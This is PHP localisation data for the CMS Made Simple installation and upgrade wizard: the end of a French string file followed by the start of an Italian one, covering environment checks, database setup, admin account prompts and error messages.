$lang['pass_php_version'] = 'La version PHP configurée actuellement ne répond pas aux exigences minimales. Le minimum nécessaire est PHP %s, mais nous recommandons PHP %s ou supérieur';
$lang['pass_pwd_writable'] = 'Le processus HTTP peut écrire dans le dossier d\'installation. Ceci est nécessaire pour l\'extraction des fichiers.';
$lang['password'] = 'Mot de passe (au moins six caractères)';
$lang['ph_sitename'] = 'Entrez un nom de site Web';
$lang['php_version'] = 'Version PHP';
$lang['post_max_size'] = 'Vérification de la taille maximale de données pouvant être enregistrées dans une seule requête POST';
$lang['prompt_addlanguages'] = 'Langues supplémentaires';
$lang['prompt_createtables'] = 'Création des tables de la base de données';
$lang['prompt_dbhost'] = 'Nom d\'hôte de la base de données';
$lang['prompt_dbinfo'] = 'Information sur la base de données';
$lang['prompt_dbname'] = 'Nom de la base de données';
$lang['prompt_dbpass'] = 'Mot de passe';
$lang['prompt_dbport'] = 'Port de la base de données';
$lang['prompt_dbprefix'] = 'Préfixe de la base de données';
$lang['prompt_dbtype'] = 'Type de la base de données';
$lang['prompt_dbuser'] = 'Nom d\'utilisateur';
$lang['prompt_dir'] = 'Dossier d\'installation&nbsp;';
$lang['prompt_installcontent'] = 'Installer les exemples de contenus et les gabarits';
$lang['prompt_queryvar'] = 'Variable d\'URL';
$lang['prompt_sitename'] = 'Nom de site Web';
$lang['prompt_timezone'] = 'Fuseau horaire du serveur';
$lang['pwd_writable'] = 'Dossier accessible en écriture';
$lang['queue_for_upgrade'] = 'File d\'attente des modules %s (autres que ceux du noyau) pour mise à jour à l\'étape suivante.';
$lang['readme_uc'] = 'Lisez-moi';
$lang['register_globals'] = 'Vérification si PHP "register globals" est désactivé';
$lang['remote_url'] = 'Vérification sur les connexions HTTP sortantes';
$lang['repeatpw'] = 'Répétez le mot de passe';
$lang['reset_site_preferences'] = 'Réinitialisation de certaines préférences du site';
$lang['reset_user_settings'] = 'Réinitialisation des préférences utilisateur';
$lang['retry'] = 'Nouvel essai';
$lang['safe_mode'] = 'Vérification si PHP "safe_mode" est désactivé';
$lang['saltpasswords'] = 'Salage des mots de passe (sécurisation)';
$lang['select_language'] = 'Veuillez sélectionner votre langue préférée dans la liste ci-dessous. 
Cela affectera uniquement le processus d\'installation/mise à jour et n\'aura aucun effet sur les paramètres par défaut de CMSMS™.';
$lang['send_admin_email'] = 'Envoi des informations d\'identification par email pour la connexion d\'administration';
$lang['session_capabilities'] = 'Test des capacités de session (les sessions utilisent des cookies et le chemin du répertoire de sauvegarde des sessions doit être accessible en écriture, etc.)';
$lang['session_save_path_exists'] = 'La variable session.save_path est valide ou le répertoire existe';
$lang['session_save_path_writable'] = 'Le chemin du répertoire session est accessible en écriture';
$lang['session_use_cookies'] = 'Vérification si les sessions PHP utilisent les cookies';
$lang['sometests_failed'] = 'Nous avons effectué de nombreux tests de votre environnement Web actuel. Bien qu\'aucun problème critique n\'ait été trouvé, nous vous recommandons de corriger les éléments suivants avant de continuer.';
$lang['step1_advanced'] = 'Mode avancé';
$lang['step1_destdir'] = 'Sélectionnez le dossier';
$lang['step1_info_destdir'] = '<strong>Attention :</strong> Ce programme peut installer ou mettre à jour plusieurs installations de CMS Made Simple™. Il est important de sélectionner correctement le dossier correspondant à une nouvelle installation ou à une mise à jour.';
$lang['step1_language'] = 'Sélectionner une langue';
$lang['step1_title'] = 'Sélectionner une langue';
$lang['step2_cmsmsfound'] = 'Une installation de CMS Made Simple™ a été détectée. Il est possible de mettre à jour cette installation. Toutefois, avant de poursuivre, assurez-vous d\'avoir une sauvegarde à jour et <strong>vérifiée</strong> de tous les fichiers et de la base de données.';
$lang['step2_cmsmsfoundnoupgrade'] = 'Bien qu\'une installation de CMS Made Simple™ ait été détectée, il n\'est pas possible de mettre à jour cette version à l\'aide de cette application. La version est peut-être trop ancienne.';
$lang['step2_confirminstall'] = 'Êtes-vous sûr(e) de vouloir installer CMS Made Simple™';
$lang['step2_confirmupgrade'] = 'Êtes-vous sûr(e) de vouloir mettre à jour CMS Made Simple™';
$lang['step2_errorsamever'] = 'Le dossier sélectionné semble contenir une installation CMSMS™ de la même version que celle incluse dans ce script. Continuer va rafraîchir l\'installation existante.';
$lang['step2_errortoonew'] = 'Le dossier sélectionné semble contenir une installation CMSMS™ avec une version plus récente que celle incluse dans ce script. Impossible de poursuivre le processus.';
$lang['step2_info_freshen'] = 'Rafraîchir cette installation va remplacer tous les fichiers du noyau ainsi que les modules installés d\'office et réinitialisera la configuration. Il vous sera demandé les informations de configuration de base, cependant la base de données ne sera pas modifiée.';
$lang['step2_installdate'] = 'Date d\'installation approximative&nbsp;';
$lang['step2_install_dirnotempty2'] = 'Ce dossier contient déjà certains fichiers et/ou sous-dossiers. Bien qu\'il soit possible d\'installer CMSMS ici, cela peut par inadvertance corrompre une installation existante. Veuillez revérifier le contenu de ce dossier. A titre de référence, certains des fichiers sont répertoriés ci-dessous. Veuillez vous assurer que tout est correct.';
$lang['step2_hdr_upgradeinfo'] = 'Informations de version';
$lang['step2_info_upgradeinfo'] = 'Ci-dessous les notes de version et le changelog disponibles pour chaque version. Les boutons ci-dessous affichent des informations détaillées sur ce qui a changé dans chaque version de CMS Made Simple. Il peut y avoir d\'autres instructions ou avertissements dans chaque version qui pourraient affecter le processus de mise à jour.';
$lang['step2_minupgradever'] = 'La version minimale que cet installateur peut mettre à jour est la : %s. Vous devrez peut-être mettre à jour votre installation CMSMS™ à une version plus récente, par étapes, en utilisant une autre méthode avant de compléter ce processus de mise à jour. Veuillez-vous assurer que vous disposez d\'une sauvegarde complète et vérifiée (fichiers et base de données) avant d\'utiliser toute méthode de mise à jour.';
$lang['step2_nocmsms'] = 'Nous n\'avons pas trouvé d\'installation de CMS Made Simple™ dans ce dossier. Il semble donc que vous vouliez faire une nouvelle installation.';
$lang['step2_nofiles'] = 'Comme demandé, les fichiers CMSMS Core ne seront pas traités pendant ce processus';
$lang['step2_passed'] = 'Passé';
$lang['step2_pwd'] = 'Votre dossier de travail courant&nbsp;';
$lang['step2_schemaver'] = 'Version du schéma de base de données&nbsp;';
$lang['step2_version'] = 'Votre version&nbsp;';
$lang['step3_failed'] = 'L\'installateur a effectué de nombreux tests de votre environnement PHP et un ou plusieurs de ces tests ont échoué. Vous devez corriger ces erreurs dans votre configuration avant de continuer. Une fois que vous aurez corrigé les erreurs, cliquez sur "Nouvel essai" ci-dessous.';
$lang['step3_passed'] = 'L\'installateur a effectué de nombreux tests de votre environnement PHP et ils ont tous réussi. C\'est une excellente nouvelle. Même s\'il ne s\'agit pas de tests garantis à 100 %, vous ne devriez avoir aucune difficulté à exécuter l\'installation de base de CMSMS™.';
$lang['step9_get_help'] = 'Connectez-vous avec d’autres développeurs CMSMS et obtenez de l\'aide des façons suivantes ';
$lang['step9_get_support'] = 'Canaux d’assistance';
$lang['step9_join_community'] = 'Rejoignez notre communauté';
$lang['step9_love_cmsms'] = 'Vous appréciez CMS Made Simple ';
$lang['step9_removethis'] = '<strong>ATTENTION</strong> Pour des raisons de sécurité, il est important que vous supprimiez l\'assistant d\'installation de votre hébergement une fois que vous aurez vérifié la réussite de l\'opération.';
$lang['step9_support_us'] = 'Cliquez ici pour découvrir comment vous pouvez nous soutenir';
$lang['symbol'] = 'Symbole';
$lang['social_message'] = 'CMS Made Simple™ a été installé correctement !';
$lang['test_failed'] = 'Un test requis a échoué';
$lang['test_passed'] = 'Un test réussi <em>(les tests passés sont seul affichés dans le mode avancé)</em>';
$lang['test_warning'] = 'Un paramètre est supérieur à la valeur requise, mais inférieur à la valeur recommandée, ou... <br>Une fonction qui peut être requise pour certaines fonctionnalités facultatives n\'est pas disponible.';
$lang['th_status'] = 'Statut';
$lang['th_testname'] = 'Test&nbsp;';
$lang['th_value'] = 'Valeur';
$lang['title_error'] = 'Houston, nous avons un problème !';
$lang['title_step2'] = 'Étape 2 - Détection de l\'installation existante';
$lang['title_step3'] = 'Étape 3 - Tests';
$lang['title_step4'] = 'Étape 4 - Informations sur la configuration de base';
$lang['title_step5'] = 'Étape 5 - Informations sur le compte d\'administration';
$lang['title_step6'] = 'Étape 6 - Paramètres du Site';
$lang['title_step7'] = 'Étape 7 - Installation des fichiers';
$lang['title_step8'] = 'Étape 8 - Travail sur la base de données';
$lang['title_step9'] = 'Étape 9 - Finalisation';
$lang['title_welcome'] = 'Bienvenue';
$lang['title_forum'] = 'Forum';
$lang['title_docs'] = 'Documentation officielle';
$lang['title_api_docs'] = 'Documentation officielle sur l\'API';
$lang['to'] = 'à';
$lang['title_share'] = 'Partagez votre expérience avec vos amis.';
$lang['tmpfile'] = 'Vérification de la fonction tmpfile()';
$lang['tmp_dirs_empty'] = 'Assurez-vous que les dossiers temporaires sont vides ou n\'existent pas';
$lang['upgrade'] = 'Mise à jour';
$lang['upgrade_deleteoldevents'] = 'Suppression des anciens évènements';
$lang['upgrading_schema'] = 'Mise à jour du schéma de base de données';
$lang['upload_max_filesize'] = 'Contrôle de la taille maximale des fichiers uploadés';
$lang['username'] = 'Nom d\'utilisateur';
$lang['warn_disable_functions'] = 'Remarque : une ou plusieurs fonctions PHP sont désactivées. Cela peut avoir des répercussions négatives sur votre installation de CMSMS™, particulièrement avec les extensions tierce partie. Vérifiez régulièrement votre journal des erreurs (logs). Les fonctions désactivées sont : <br><br>%s';
$lang['warn_max_execution_time'] = 'Bien que la valeur du temps d\'exécution maximum (max_execution_time) de %s est supérieure (ou égale) à la valeur minimale de %s, nous vous recommandons de l\'augmenter à la valeur de %s ou plus';
$lang['warn_memory_limit'] = 'Votre valeur de limite de mémoire (memory_limit) est %s, ce qui est supérieur au minimum de %s. Cependant %s est recommandé.';
$lang['warn_open_basedir'] = 'open_basedir est activé dans votre configuration PHP. Bien que vous puissiez continuer, CMSMS n\'assure pas de support sur les installations faites avec les restrictions open_basedir';
$lang['warn_post_max_size'] = 'Votre valeur maximum par méthode POST (post_max_size) est de %s et dépasse la valeur minimale de %s, cependant, nous vous recommandons de la porter à %s et faire en sorte qu\'elle soit supérieure à "upload_max_filesize"';
$lang['warn_tests'] = '<strong>Remarque :</strong> réussir tous ces tests devrait assurer que les fonctions essentielles de CMSMS™ fonctionnent correctement pour la plupart des sites. Cependant, au fur et à mesure que le site se développe et reçoit de nouvelles fonctionnalités, ces valeurs minimales peuvent devenir insuffisantes. En outre, les modules tiers peuvent avoir des exigences supplémentaires pour fonctionner correctement.';
$lang['warn_upload_max_filesize'] = 'Bien que votre paramètre de %s soit suffisant, nous recommandons d’augmenter le paramètre "upload_max_filesize" dans la configuration PHP à un minimum de %s';
$lang['welcome_message'] = 'Bienvenue ! Vous voici dans le processus d\'installation automatique de CMS Made Simple™. Ce script vérifie que votre hébergement est compatible avec CMSMS™, vous permettant ainsi d\'installer ou de mettre à jour la dernière version de CMSMS™ rapidement et facilement. <br>Nous savons que vous allez l\'apprécier.';
$lang['wizard_step1'] = 'Bienvenue';
$lang['wizard_step2'] = 'Détection de l\'installation existante';
$lang['wizard_step3'] = 'Tests de compatibilité';
$lang['wizard_step4'] = 'Information de configuration';
$lang['wizard_step5'] = 'Informations sur le compte d\'administration';
$lang['wizard_step6'] = 'Paramètres du site';
$lang['wizard_step7'] = 'Fichiers';
$lang['wizard_step8'] = 'Gestion de la base de données';
$lang['wizard_step9'] = 'Finalisation';
$lang['xml_functions'] = 'Vérification des fonctionnalités XML';
$lang['yes'] = 'Oui';
?><?php
$lang['action_freshen'] = 'Rinnovamento / Riparazione di una installazione CMSMS %s';
$lang['action_install'] = 'Creazione di un nuovo sito con CMSMS %s';
$lang['action_upgrade'] = 'Aggiornamento di un sito con CMSMS alla versione %s';
$lang['advanced_mode'] = 'Abilita modalità avanzata';
$lang['apptitle'] = 'Assistente installazione e aggiornamento';
$lang['assets_dir_exists'] = 'Directory assets esistente';
$lang['available_languages'] = 'Lingue disponibili';
$lang['build_date'] = 'Data di creazione';
$lang['changelog_uc'] = 'CHANGELOG';
$lang['cleaning_files'] = 'Pulizia dei file non più applicabili al rilascio';
$lang['config_writable'] = 'Controllo file di configurazione scrivibile';
$lang['confirm_freshen'] = 'Sicuro di voler rinnovare (riparare) l\'installazione esistente di CMSMS? Usare con estrema cautela!';
$lang['confirm_upgrade'] = 'Sicuro di voler iniziare il processo di aggiornamento';
$lang['curl_extension'] = 'Controllo estensione Curl';
$lang['create_assets_structure'] = 'Creazione di un percorso per le risorse dei file';
$lang['database_support'] = 'Controllo driver di database compatibili';
$lang['desc_wizard_step1'] = 'Inizia l\'installazione o il processo di aggiornamento';
$lang['desc_wizard_step2'] = 'Analizza directory di destinazione per trovare il software esistente';
$lang['desc_wizard_step3'] = 'Controllo che tutto sia OK per installare il CMSMS Core';
$lang['desc_wizard_step4'] = 'Per le nuove installazioni, e le operazioni di rinnovamento, immettere le informazioni configurazione di base';
$lang['desc_wizard_step5'] = 'Per le nuove installazioni, immettere le informazioni account Admin';
$lang['desc_wizard_step6'] = 'Per le nuove installazioni inserire alcuni dettagli di base del sito';
$lang['desc_wizard_step7'] = 'Estrazione files';
$lang['desc_wizard_step8'] = 'Creazione o aggiornamento dello schema del database, impostazione eventi iniziali, permessi, account utente, template, fogli di stile e contenuti';
$lang['desc_wizard_step9'] = 'Installazione e/o aggiornamento dei moduli se necessario, scrittura file di configurazione, e pulizia.';
$lang['destination_directory'] = 'Directory di destinazione';
$lang['dest_writable'] = 'Permesso di scrittura nella directory di destinazione';
$lang['disable_functions'] = 'Controllo funzioni disabilitate';
$lang['done'] = 'fatto';
$lang['email_accountinfo_message'] = 'L\'installazione di CMS Made Simple è completa.

Questa email contiene informazioni sensibili e deve essere conservata in un luogo sicuro.

Ecco i dettagli della vostra installazione.
username: %s
Password: %s
directory di installazione: %s
url root: %s';
$lang['email_accountinfo_message_exp'] = 'L\'installazione di CMS Made Simple è completa.

Questa email contiene informazioni sensibili e deve essere conservata in un luogo sicuro.

Ecco i dettagli della vostra installazione.
username: %s
Password: %s
directory di installazione: %s';
$lang['email_accountinfo_subject'] = 'Installazione di CMS Made Simple riuscita con successo';
$lang['emailaccountinfo'] = 'Invio informazioni account via e-mail';
$lang['emailaddr'] = 'Indirizzo e-mail';
$lang['error_adminacct_emailaddr'] = 'L\'indirizzo e-mail che hai indicato non è valido';
$lang['error_adminacct_emailaddrrequired'] = 'Hai scelto l\'invio delle informazioni dell\'account via e-mail ma l\'indirizzo che hai indicato non è valido';
$lang['error_adminacct_password'] = 'La password specificata non è (valida Deve essere di almeno 6 caratteri)';
$lang['error_adminacct_repeatpw'] = 'La password inserita non corrisponde.';
$lang['error_adminacct_username'] = 'L\'username indicato non è valido.  Per favore riprova.';
$lang['error_admindirrenamed'] = 'Sembra che, per ragioni di sicurezza, tu possa aver rinominato la directory admin del tuo CMSMS. Devi invertire <a href="https://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external">questo processo</a> al fine di procedere!<br/><br/>Una volta ripristinato il nome della directory admin al percorso originale, ricarica questa pagina.';
$lang['error_backupconfig'] = 'Non è stato possibile effettuare correttamente il backup del file di configurazione';
$lang['error_checksum'] = 'Il checksum  del file estratto non corrisponde all\'originale';
$lang['error_cmstablesexist'] = 'Sembra che ci sia già un\'installazione di CMSMS in questo database. Per favore inserisci delle informazioni diverse per il database. Se desideri usare un diverso prefisso per le tabelle devi riavviare il processo di installazione ed attivare la modalità avanzata.';
$lang['error_createtable'] = 'Problema durante la creazione della tabella nel database.  Forse è una questione di permessi';
$lang['error_dbconnect'] = 'Non è stato possibile collegarsi al database.  Per favore ricontrolla le credenziali fornite';
$lang['error_dirnotvalid'] = 'La directory %s non esiste (o non è scrivibile)';
$lang['error_droptable'] = 'Problema durante l\'eliminazione della tabella.  Forse è una questione di permessi';
$lang['error_filenotwritable'] = 'Non è stato possibile sovrascrivere il file %s (problema di permessi)';
$lang['error_internal'] = 'Spiacente, qualcosa non ha funzionato... (internal error) (%s)';
$lang['error_invalid_directory'] = 'Sembra che la directory che hai scelto per l\'installazione sia una directory di lavoro dello stesso installer';
$lang['error_invalidconfig'] = 'Errore nel file di configurazione oppure manca il file di configurazione';
$lang['error_invaliddbpassword'] = 'La password del database contiene dei caratteri non validi che non possono essere salvati in modo sicuro.';
$lang['error_invalidkey'] = 'Variabile membro non valida o chiave %s per la classe %s';
$lang['error_invalidparam'] = 'Parametro o valore del parametro non valido: %s';
$lang['error_invalidtimezone'] = 'Il fuso orario specificato non è valido';
$lang['error_invalidqueryvar'] = 'La variabile della query inserita contiene caratteri non validi.  Per favore usa solo caratteri alfanumerici ed il segno di sottolineato.';
$lang['error_missingconfigvar'] = 'La chiave "%s" risulta mancante o non valida nel file config.ini';
$lang['error_noarchive'] = 'Problema nel trovare il file archivio... Per favore ricomincia';
$lang['error_nlsnotfound'] = 'Problema nel trovare i file NLS nell\'archivio';
$lang['error_nodatabases'] = 'Non è stato possibile trovare un\'estensione compatibile del database';
$lang['error_nodbhost'] = 'Per favore inserisci un hostname valido oppure un indirizzo IP per la connessione del database';
$lang['error_nodbname'] = 'Per favore inserisci il nome di un database valido presso l\'host specificato qui sopra';
$lang['error_nodbpass'] = 'Per favore inserisci una password valida per l\'autenticazione col database';
$lang['error_nodbprefix'] = 'Per favore inserisci un prefisso valido per le tabelle del database';
$lang['error_nodbtype'] = 'Per favore seleziona un tipo di database';
$lang['error_nodbuser'] = 'Per favore inserisci un username valido per l\'autenticazione col database';
$lang['error_nodestdir'] = 'Directory di destinazione non impostata';
$lang['error_nositename'] = 'Il nome del sito è un parametro richiesto. Per favore inseriscine uno adeguato per il tuo sito.';
$lang['error_notimezone'] = 'Per favore inserisci un fuso orario valido per questo server';
$lang['error_overwrite'] = 'Problema con i permessi: non posso sovrascrivere %s';
$lang['error_sendingmail'] = 'Errore nell\'invio della mail';
$lang['error_tzlist'] = 'Si è verificato un problema nel recuperare l\'elenco degli identificatori del fuso orario';
$lang['errorlevel_estrict'] = 'Controllo per E_STRICT';
$lang['errorlevel_edeprecated'] = 'Controllo per E_DEPRECATED';
$lang['edeprecated_enabled'] = 'E_DEPRECATED è attivato in PHP error_reporting.  Sebbene ciò non impedirà a CMSMS di funzionare, potrebbero venire visualizzati dei warning nelle schermate di output, in particolar modo con vecchi moduli di terze parti';
$lang['estrict_enabled'] = 'E_STRICT è attivato in PHP error_reporting. Sebbene ciò non impedirà a CMSMS di funzionare, potrebbero essere visualizzati dei warning nell\'output HTML, in particolar modo con vecchi moduli di terze parti';
$lang['fail_assets_dir'] = 'Una directory assets esiste già.  Questa applicazione potrebbe scrivere in questa directory per razionalizzare il percorso dei file.  Per favore assicurati di avere un backup';
$lang['fail_assets_msg'] = 'Una directory assets esiste già.  Questa applicazione potrebbe scrivere in questa directory per razionalizzare il percorso dei file.  Per favore assicurati di avere un backup';
$lang['fail_config_writable'] = 'Il processo HTTP non pu&ograve scrivere nel file config.php. Per favore cerca di cambiare i permessi di questo file a 777 fino a che il processo di aggiornamento non sarà completato';
$lang['fail_curl_extension'] = 'L\'estensione curl non è stata trovata. Sebbene non sia un problema critico, ciò potrebbe provocare problemi con alcuni moduli di terze parti';
$lang['fail_database_support'] = 'Non sono stati trovati driver del database compatibili';
$lang['fail_file_get_contents'] = 'La funzione file_get_contents non esiste oppure è disattivata. CMSMS non può continuare (probabilmente anche l\'installer fallirà)';
$lang['fail_file_uploads'] = 'Le funzionalità di caricamento dei file sono disattivate in questo ambiente. Alcune funzioni di CMSMS non funzioneranno in questo ambiente';
$lang['fail_func_json'] = 'La funzionalità json non è stata trovata';
$lang['fail_func_gzopen'] = 'La funzione gzopen non è stata trovata';
$lang['fail_func_md5'] = 'La funzionalità md5 non è stata trovata';
$lang['fail_func_tempnam'] = 'La funzione tempnam non esiste. E\' una funzione richiesta per il funzionamento di CMSMS';
$lang['fail_func_ziparchive'] = 'La funzionalità ZipArchive non è stata trovata.  Ciò potrebbe limitare il funzionamento';
$lang['fail_ini_set'] = 'Sembra che non sia possibile cambiare le impostazioni ini. Ciò potrebbe provocare problemi con i moduli di terze parti (o quando si attiva la modalità debug)';
$lang['fail_magic_quotes_runtime'] = 'Sembra che magic quotes siano attivate nella tua configurazione. Per favore disabilitale e riprova';
$lang['fail_max_execution_time'] = 'Il tuo tempo massimo di esecuzione di %s non coincide con il valore minimo di %s.  Ti raccomandiamo di aumentarlo a %s o più';
$lang['fail_memory_limit'] = 'Il valore del tuo limite di memoria è troppo basso. Tu avevi %s, ma un minimo di %s è richiesto e %s viene raccomandato';
$lang['fail_multibyte_support'] = 'Il supporto a Multibyte non è attivato nella tua configurazione';
$lang['fail_output_buffering'] = 'Non è attivato Output buffering.';
$lang['fail_open_basedir'] = 'Sono attive le restrizioni Open basedir. CMSMS richiede che ciò venga disattivato';
$lang['fail_php_version'] = 'La versione di PHP disponibile per CMSMS è di importanza critica. La versione minima accettata è la %s, sebbene si raccomandi la versione %s o superiore. Tu hai la %s';
$lang['fail_post_max_size'] = 'Il tuo post max size di %s non coincide con il valore minimo di %s. Un valore %s o superiore è raccomandato ed assicurati che sia più ampio del upload_max_filesize';
$lang['fail_pwd_writable2'] = 'Il processo HTTP deve essere in grado di scrivere nella directory di destinazione (in tutti i file e nelle directory al di sotto) al fine di installare i file. Non abbiamo i permessi di scrittura in (almeno ) %s';
$lang['fail_register_globals'] = 'Per favore disattiva register globals nella tua configurazione di PHP';
$lang['fail_remote_url'] = 'Abbiamo riscontrato dei problemi nel collegarci ad un URL remoto.  Ciò limiterà alcune funzionalità di CMS Made Simple';
$lang['fail_safe_mode'] = 'CMSMS non funzionerà correttamente in un ambiente dove sia attivato safe mode. Safe mode è deprecato in quanto modalità non più valida e verrà rimosso nelle prossime versioni di PHP';
$lang['fail_session_save_path_exists'] = 'Il valore della variabile della sessione save path non è valido';
$lang['fail_session_save_path_writable'] = 'La directory della sessione save path non è scrivibile';
$lang['fail_session_use_cookies'] = 'CMSMS richiede che il PHP sia configurato in modo da archiviare la chiave della sessione in un cookie';
$lang['fail_tmpfile'] = 'La funzione system tmpfile() non funziona. Ciò è richiesto per consentirci di estrarre gli archivi. L\'argomento dell\'url TMPDIR facoltativo può essere fornito all\'installer per indicare una directory scrivibile. Si veda il file README che dovrebbe essere incluso in questa directory.';
$lang['fail_tmp_dirs_empty'] = 'Le directory temporanee di CMSMS <em>(tmp/cache e tmp/templates_c) esistono e non sono vuote.  Per favore rimuovile o svuotale';
$lang['fail_xml_functions'] = 'L\'estensione XML non è stata trovata. Per favore attivala nel tuo ambiente PHP';
$lang['failed'] = 'fallito';
$lang['file_get_contents'] = 'Test della funzione file_get_contents';
$lang['file_installed'] = 'Installato %s';
$lang['file_uploads'] = 'Controllo il supporto per l\'upload di file';
$lang['finished_custom_freshen_msg'] = 'La tua installazione è stata rinnovata! I file del core sono stati aggiornati ed un nuovo file di configurazione è stato creato. Per favore visita il tuo sito per verificare che tutto funzioni correttamente';
$lang['finished_custom_install_msg'] = 'Fatto! Per favore visita il tuo sito ed effettua il login al pannello di amministrazione.';
$lang['finished_custom_upgrade_msg'] = 'Fatto!  Per favore visita il pannello di amministrazione del tuo CMSMS ed il frontend per verificare che tutto funzioni correttamente.<br/><strong>Suggerimento:</strong> Adesso è il momento giusto per creare un nuovo backup.';
$lang['finished_freshen_msg'] = 'La tua installazione è stata rinnovata! I file del core sono stati aggiornati ed un nuovo file di configurazione è stato creato.  Ora puoi <a href="%s">visitare  il tuo sito</a> o effettuare il login al <a href="%s">pannello di amministrazione di CMSMS</a>.';
$lang['finished_install_msg'] = 'Abbiamo finito! Ora puoi <a href="%s">visitare il tuo sito</a> o effettuare il login al <a href="%s">pannello di amministrazione di CMSMS</a>.';
$lang['finished_upgrade_msg'] = 'Tutto fatto! Per favore visita il <a href="%s">frontend del tuo sito</a> e il <a href="%s">Pannello di amministrazione</a> per verificare che funzioni correttamente. Potresti anche dover aggiornare alcuni moduli di terze parti.<br/><strong>Suggerimento:</strong> Ricordati di creare un altro backup dopo aver verificato il corretto funzionamento.';
$lang['freshen'] = 'Rinnova (ripara) installazione';
$lang['func_json'] = 'Controllo la funzionalità json di encoding e decoding';
$lang['func_md5'] = 'Controllo la funzionalità md5';
$lang['func_tempnam'] = 'Controllo funzione tempnam';
$lang['func_gzopen'] = 'Controllo funzione gzopen';
$lang['func_ziparchive'] = 'Controllo funzione ziparchive';
$lang['gd_version'] = 'Versione GD';
$lang['goback'] = 'Indietro';
$lang['info_addlanguages'] = 'Seleziona le lingue(in aggiunta all\'inglese) da installare. <strong>Nota:</strong> non tutte le traduzioni sono complete.';
$lang['info_adminaccount'] = 'Per favore fornisci le credenziali per l\'account dell\'amministratore iniziale. Questo account avrà accesso a tutte le funzionalità della console amministrativa di CMSMS.';
$lang['info_advanced'] = 'La modalità avanzata abilita altre opzioni nella procedura di installazione.';
$lang['info_dbinfo'] = 'CMS Made Simple archivia una grande mole di dati nel database. Una connessione al database è obbligatoria. Inoltre, le credenziali dell\'utente che fornisci debbono avere ALL PRIVILEGES sul database indicato per consentire la creazione, l\'eliminazione e la modifica delle tabelle, indici e views.';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED è un flag per la segnalazione di errori di PHP che indica che dei warnings dovrebbero essere mostrati in relazione a codice che usa tecniche deprecate.  Sebbene il core di CMSMS cerchi di assicurare che non si usino più tecniche deprecate, alcuni moduli potrebbero non farlo. Si raccomanda di disattivare questa impostazione nella configurazione di PHP';
$lang['info_errorlevel_estrict'] = 'E_STRICT è un flag per la segnalazione di errori di PHP il quale indica che devono essere rispettati rigorosi standard di codifica. Sebbene il core di CMSMS cerchi di conformarsi agli standard di E_STRICT, alcuni moduli potrebbero non farlo. Si raccomanda che questa impostazione venga disattivata nella configurazione di PHP';
$lang['info_installcontent'] = 'Di default, questo installer creerà una serie di pagine di esempio, fogli di stile e modelli  in CMSMS. I contenuti di esempio forniscono informazioni estese e suggerimenti per aiutare nella creazione di siti web con CMSMS ed è utile leggerli. Tuttavia, se hai già confidenza con CMS Made Simple, disabilitando questa opzione si otterranno un insieme minimo di modelli, fogli di stile e pagine di contenuto.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir è attivato nella tua configurazione di PHP. Non è stato possibile verificare adeguatamente le capacità di sessione. Tuttavia, essendo arrivati a questopunto del processo di installazione significa probabilmente che le sessioni funzionano correttamente.';
$lang['info_pwd_writable'] = 'Questa applicazione necessita dei permessi di scrittura nella directory di lavoro corrente';
$lang['info_queryvar'] = 'La variabile della query viene usata internamente da CMSMS per identificare la pagina richiesta. Nella maggior parte dei casi non dovrebbe essere necessario regolarla.';
$lang['info_sitename'] = 'Il nome del sito viene usato nei modelli predefiniti come parte del titolo. Per favore inserisci un nome per il sito leggibile da parte di una persona';
$lang['info_timezone'] = 'L\'informazione relativa al fuso orario è necessaria per i calcoli del tempo e per le visualizzazioni di tempo/data. Per favore seleziona il fuso orario del server';
$lang['ini_set'] = 'Test della possibilità di cambiare le impostazioni INI in corso';
$lang['install'] = 'Installa';
$lang['install_attachstylesheets'] = 'Collega i fogli di stile ai temi';
$lang['install_backupconfig'] = 'Back up del file di configurazione in corso';
$lang['install_createassets'] = 'Crea struttura assets';
$lang['install_created_index'] = 'Creato indice %s ... %s';
$lang['install_create_tables'] = 'Crea tabelle database';
$lang['install_createconfig'] = 'Crea nuovo file di configurazione';
$lang['install_createcontentpages'] = 'Crea pagine di contenuto predefinito';
$lang['install_created_table'] = 'Creata tabella %s: .... %s';
$lang['install_createtablesindexes'] = 'Creazione di tabelle ed indici in corso';
$lang['install_createtmpdirs'] = 'Crea directory temporanee';
$lang['install_creating_index'] = 'Creato indice %s';
$lang['install_default_collections'] = 'Installa le collezioni predefinite';
$lang['install_defaultcontent'] = 'Installa il contenuto predefinito';
$lang['install_detectlanguages'] = 'Rileva lingue installate';
$lang['install_dropping_tables'] = 'Eliminazione tabelle in corso';
$lang['install_dummyindexhtml'] = 'Crea file index.html vuoti';
$lang['install_extractfiles'] = 'Estrai file dall\'archivio';
$lang['install_initevents'] = 'Crea eventi';
$lang['install_initsitegroups'] = 'Crea gruppi iniziali';
$lang['install_initsiteperms'] = 'Imposta i permessi iniziali';
$lang['install_initsiteprefs'] = 'Imposta le preferenze iniziali del sito';
$lang['install_initsiteusers'] = 'Crea l\'account dell\'utente iniziale';
$lang['install_initsiteusertags'] = 'Tag definiti dall\'utente iniziali';
$lang['install_module'] = 'Installa il modulo %s';
$lang['install_modules'] = 'Installa moduli disponibili';
$lang['install_passwordsalt'] = 'Imposta password salt';
$lang['install_requireddata'] = 'Imposta i dati iniziali richiesti';
$lang['install_schema'] = 'Crea schema del database';
$lang['install_setschemaver'] = 'Imposta versione schema';
$lang['install_setsequence'] = 'Resetta sequenza tabelle';
$lang['install_setsitename'] = 'Imposta il nome del sito';
$lang['install_stylesheets'] = 'Crea i fogli di stile predefiniti';
$lang['install_templates'] = 'Crea i modelli predefiniti';
$lang['install_templatetypes'] = 'Crea tipi di modelli standard';
$lang['install_update_sequences'] = 'Aggiorna sequenza tabelle';
$lang['install_updatehierarchy'] = 'Aggiorna le posizioni di gerarchia del contenuto';
$lang['install_updateseq'] = 'Aggiorna sequenza per %s';
$lang['installer_ver'] = 'Versione installer';
$lang['legend'] = 'Legenda';
$lang['magic_quotes_runtime'] = 'Assicurati che magic quotes siano disattivate';
$lang['max_execution_time'] = 'Verifica del tempo massimo di esecuzione dello script PHP in corso';
$lang['meaning'] = 'Significato';
$lang['memory_limit'] = 'Verifica di un limite sufficiente di memoria di PHP in corso';
$lang['msg_clearedcache'] = 'Pulita la cache del server';
$lang['msg_configsaved'] = 'File di configurazione esistente salvato in %s';
$lang['msg_upgrade_module'] = 'Aggiornamento in corso del modulo %s';
$lang['msg_upgrademodules'] = 'Aggiornamento dei moduli in corso';
